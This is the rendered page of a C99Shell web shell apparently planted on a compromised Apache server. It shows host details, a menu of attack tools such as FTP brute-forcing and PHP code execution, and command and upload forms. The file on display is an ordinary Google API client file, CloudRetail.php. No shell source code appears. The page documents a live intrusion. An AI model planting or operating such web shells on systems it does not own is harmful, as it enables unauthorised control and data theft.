!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/google/apiclient-services/src/Google/Service/   drwxr-xr-x
Free 13.04 GB of 57.97 GB (22.49%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CloudRetail.php (11.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

/**
 * Service definition for CloudRetail (v2).
 *
 * <p>
 * Cloud Retail service enables customers to build end-to-end personalized
 * recommendation systems without requiring a high level of expertise in machine
 * learning, recommendation system, or Google Cloud.</p>
 *
 * <p>
 * For more information about this service, see the API
 * <a href="https://cloud.google.com/recommendations" target="_blank">Documentation</a>
 * </p>
 *
 * @author Google, Inc.
 */
class Google_Service_CloudRetail extends Google_Service
{
  
/** See, edit, configure, and delete your Google Cloud Platform data. */
  
const CLOUD_PLATFORM =
      
"https://www.googleapis.com/auth/cloud-platform";

  public 
$projects_locations_catalogs;
  public 
$projects_locations_catalogs_branches_operations;
  public 
$projects_locations_catalogs_branches_products;
  public 
$projects_locations_catalogs_operations;
  public 
$projects_locations_catalogs_placements;
  public 
$projects_locations_catalogs_userEvents;
  public 
$projects_locations_operations;

  
/**
   * Constructs the internal representation of the CloudRetail service.
   *
   * @param Google_Client $client The client used to deliver requests.
   * @param string $rootUrl The root URL used for requests to the service.
   */
  
public function __construct(Google_Client $client$rootUrl null)
  {
    
parent::__construct($client);
    
$this->rootUrl $rootUrl ?: 'https://retail.googleapis.com/';
    
$this->servicePath '';
    
$this->batchPath 'batch';
    
$this->version 'v2';
    
$this->serviceName 'retail';

    
$this->projects_locations_catalogs = new Google_Service_CloudRetail_Resource_ProjectsLocationsCatalogs(
        
$this,
        
$this->serviceName,
        
'catalogs',
        array(
          
'methods' => array(
            
'list' => array(
              
'path' => 'v2/{+parent}/catalogs',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'parent' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'patch' => array(
              
'path' => 'v2/{+name}',
              
'httpMethod' => 'PATCH',
              
'parameters' => array(
                
'name' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'updateMask' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->projects_locations_catalogs_branches_operations = new Google_Service_CloudRetail_Resource_ProjectsLocationsCatalogsBranchesOperations(
        
$this,
        
$this->serviceName,
        
'operations',
        array(
          
'methods' => array(
            
'get' => array(
              
'path' => 'v2/{+name}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'name' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
          )
        )
    );
    
$this->projects_locations_catalogs_branches_products = new Google_Service_CloudRetail_Resource_ProjectsLocationsCatalogsBranchesProducts(
        
$this,
        
$this->serviceName,
        
'products',
        array(
          
'methods' => array(
            
'create' => array(
              
'path' => 'v2/{+parent}/products',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'parent' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'productId' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'delete' => array(
              
'path' => 'v2/{+name}',
              
'httpMethod' => 'DELETE',
              
'parameters' => array(
                
'name' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'get' => array(
              
'path' => 'v2/{+name}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'name' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'import' => array(
              
'path' => 'v2/{+parent}/products:import',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'parent' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'patch' => array(
              
'path' => 'v2/{+name}',
              
'httpMethod' => 'PATCH',
              
'parameters' => array(
                
'name' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'allowMissing' => array(
                  
'location' => 'query',
                  
'type' => 'boolean',
                ),
                
'updateMask' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->projects_locations_catalogs_operations = new Google_Service_CloudRetail_Resource_ProjectsLocationsCatalogsOperations(
        
$this,
        
$this->serviceName,
        
'operations',
        array(
          
'methods' => array(
            
'get' => array(
              
'path' => 'v2/{+name}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'name' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'list' => array(
              
'path' => 'v2/{+name}/operations',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'name' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'filter' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
    
$this->projects_locations_catalogs_placements = new Google_Service_CloudRetail_Resource_ProjectsLocationsCatalogsPlacements(
        
$this,
        
$this->serviceName,
        
'placements',
        array(
          
'methods' => array(
            
'predict' => array(
              
'path' => 'v2/{+placement}:predict',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'placement' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
          )
        )
    );
    
$this->projects_locations_catalogs_userEvents = new Google_Service_CloudRetail_Resource_ProjectsLocationsCatalogsUserEvents(
        
$this,
        
$this->serviceName,
        
'userEvents',
        array(
          
'methods' => array(
            
'collect' => array(
              
'path' => 'v2/{+parent}/userEvents:collect',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'parent' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'ets' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
                
'uri' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
                
'userEvent' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
'import' => array(
              
'path' => 'v2/{+parent}/userEvents:import',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'parent' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'purge' => array(
              
'path' => 'v2/{+parent}/userEvents:purge',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'parent' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'rejoin' => array(
              
'path' => 'v2/{+parent}/userEvents:rejoin',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'parent' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'write' => array(
              
'path' => 'v2/{+parent}/userEvents:write',
              
'httpMethod' => 'POST',
              
'parameters' => array(
                
'parent' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
          )
        )
    );
    
$this->projects_locations_operations = new Google_Service_CloudRetail_Resource_ProjectsLocationsOperations(
        
$this,
        
$this->serviceName,
        
'operations',
        array(
          
'methods' => array(
            
'get' => array(
              
'path' => 'v2/{+name}',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'name' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
              ),
            ),
'list' => array(
              
'path' => 'v2/{+name}/operations',
              
'httpMethod' => 'GET',
              
'parameters' => array(
                
'name' => array(
                  
'location' => 'path',
                  
'type' => 'string',
                  
'required' => true,
                ),
                
'filter' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
                
'pageSize' => array(
                  
'location' => 'query',
                  
'type' => 'integer',
                ),
                
'pageToken' => array(
                  
'location' => 'query',
                  
'type' => 'string',
                ),
              ),
            ),
          )
        )
    );
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0061 ]--